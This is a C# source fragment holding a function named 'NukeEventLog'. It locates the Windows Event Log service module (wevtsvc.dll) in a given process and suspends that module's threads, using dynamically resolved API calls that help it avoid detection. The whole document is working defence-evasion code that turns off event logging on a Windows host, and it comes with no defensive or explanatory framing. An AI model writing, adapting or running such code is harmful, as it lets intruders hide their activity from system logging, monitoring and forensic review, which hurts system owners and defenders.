public static bool NukeEventLog(int pid) { bool nuked = false; IntPtr[] modules = new IntPtr[256]; uint moduleSize = (uint)(Marshal.SizeOf(typeof(IntPtr)) * (modules.Length)); uint moduleSizeNeeded = 0; int modulesCount = 0; STRUCTS.THREADENTRY32 threadEntry = new STRUCTS.THREADENTRY32(); threadEntry.dwSize = (uint)Marshal.SizeOf(threadEntry); StringBuilder baseModuleName = new StringBuilder(1024); GCHandle gch = GCHandle.Alloc(modules, GCHandleType.Pinned); // Don't forget to free this later IntPtr pModules = gch.AddrOfPinnedObject(); IntPtr serviceModule = IntPtr.Zero; IntPtr threadHandle = IntPtr.Zero; IntPtr threadStartAddress = IntPtr.Zero; STRUCTS.MODULEINFO serviceModuleInfo = new STRUCTS.MODULEINFO(); IntPtr serviceModuleInfoPtr = Marshal.AllocHGlobal(Marshal.SizeOf(serviceModuleInfo)); Marshal.StructureToPtr(serviceModuleInfo, serviceModuleInfoPtr, false); STRUCTS.THREAD_BASIC_INFORMATION threadBasicInformation = new STRUCTS.THREAD_BASIC_INFORMATION(); Object[] openProcessParams = { DInvoke.Data.Win32.Kernel32.ProcessAccessFlags.MAXIMUM_ALLOWED, false, (uint)pid }; IntPtr serviceProcessHandle = (IntPtr)Generic.DynamicAPIInvoke("kernel32.dll", "OpenProcess", typeof(Win32.Delegates.OpenProcess), ref openProcessParams); if (serviceProcessHandle == IntPtr.Zero) { throw new Exception("handle could not be opened for pid" + pid); } object[] createToolhelp32Params = { STRUCTS.SnapshotFlags.Thread, (uint)0 }; IntPtr snapshotHandle = (IntPtr)Generic.DynamicAPIInvoke("kernel32.dll", "CreateToolhelp32Snapshot", typeof(DELEGATES.CreateToolhelp32Snapshot), ref createToolhelp32Params); if (snapshotHandle == IntPtr.Zero) { throw new Exception("snapshot could not be made."); } /* https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumprocessmodules#requirements */ object[] enumProcessModulesParams = { serviceProcessHandle, pModules, moduleSize, moduleSizeNeeded }; bool success = (bool)Generic.DynamicAPIInvoke("psapi.dll", "EnumProcessModules", typeof(DELEGATES.EnumProcessModules), ref enumProcessModulesParams, true); pModules = (IntPtr)enumProcessModulesParams[1]; moduleSizeNeeded = (uint)enumProcessModulesParams[3]; if (!success) { throw new Exception("modules could not be enumerated"); } modulesCount = (Int32)(moduleSizeNeeded / (Marshal.SizeOf(typeof(IntPtr)))); for (int i = 0; i < modulesCount; i++) { serviceModule = modules[i]; // Object[] getModBaseNameParams = { serviceProcessHandle, serviceModule, baseModuleName, baseModuleName.Capacity }; //Generic.DynamicAPIInvoke("psapi.dll", "GetModuleBaseNameA", typeof(DELEGATES.GetModuleBaseName), ref enumProcessModulesParams, true); //baseModuleName = (StringBuilder)getModBaseNameParams[2]; GetModuleBaseName(serviceProcessHandle, serviceModule, baseModuleName, baseModuleName.Capacity); if (baseModuleName.ToString() == "wevtsvc.dll") { string addr = string.Format("0x{0:X}", serviceModule); Console.WriteLine("{0} found at {1}", baseModuleName.ToString(), addr); Object[] getModuleInformationParams = { serviceProcessHandle, serviceModule, serviceModuleInfoPtr, (uint)Marshal.SizeOf(serviceModuleInfo) }; Generic.DynamicAPIInvoke("psapi.dll", "GetModuleInformation", typeof(DELEGATES.GetModuleInformation), ref getModuleInformationParams, true); serviceModuleInfoPtr = (IntPtr)getModuleInformationParams[2]; serviceModuleInfo = (STRUCTS.MODULEINFO)Marshal.PtrToStructure(serviceModuleInfoPtr, typeof(STRUCTS.MODULEINFO)); } } Object[] thread32FirstParams = { snapshotHandle, threadEntry }; Generic.DynamicAPIInvoke("kernel32.dll", "Thread32First", typeof(DELEGATES.Thread32First), ref thread32FirstParams, true); threadEntry = (STRUCTS.THREADENTRY32)thread32FirstParams[1]; //Object[] thread32NextParams = { snapshotHandle, threadEntry }; //threadEntry = (STRUCTS.THREADENTRY32)thread32NextParams[1]; while (Thread32Next(snapshotHandle, ref threadEntry)) { if (threadEntry.th32OwnerProcessID == pid) { Object[] openThreadParams = { DInvoke.Data.Win32.Kernel32.ThreadAccess.MAXIMUM_ALLOWED, false, threadEntry.th32ThreadID }; threadHandle = (IntPtr)Generic.DynamicAPIInvoke("kernel32.dll", "OpenThread", typeof(DELEGATES.OpenThread), ref openThreadParams, true); Object[] ntQueryInformationParams = { threadHandle, STRUCTS.ThreadInfoClass.ThreadQuerySetWin32StartAddress, threadStartAddress, (uint)Marshal.SizeOf(threadStartAddress), IntPtr.Zero }; Native.NTSTATUS status = (Native.NTSTATUS)Generic.DynamicAPIInvoke("ntdll.dll", "NtQueryInformationThread", typeof(DELEGATES.NtQueryInformationThread), ref ntQueryInformationParams, true); threadStartAddress = (IntPtr)ntQueryInformationParams[2]; if (threadStartAddress.ToInt64() >= serviceModuleInfo.lpBaseOfDll.ToInt64() && threadStartAddress.ToInt64() <= serviceModuleInfo.lpBaseOfDll.ToInt64() + serviceModuleInfo.sizeOfImage) { Console.WriteLine("suspending eventlog thread {0}", threadEntry.th32ThreadID); Object[] suspendParams = { threadHandle }; Generic.DynamicAPIInvoke("kernel32.dll", "SuspendThread", typeof(DELEGATES.SuspendThread), ref suspendParams, true); } nuked = true; } //threadEntry = (STRUCTS.THREADENTRY32)thread32NextParams[1]; } gch.Free(); Marshal.FreeHGlobal(serviceModuleInfoPtr); return(nuked); }
static extern bool Thread32Next(IntPtr hSnapshot, ref STRUCTS.THREADENTRY32 lpte);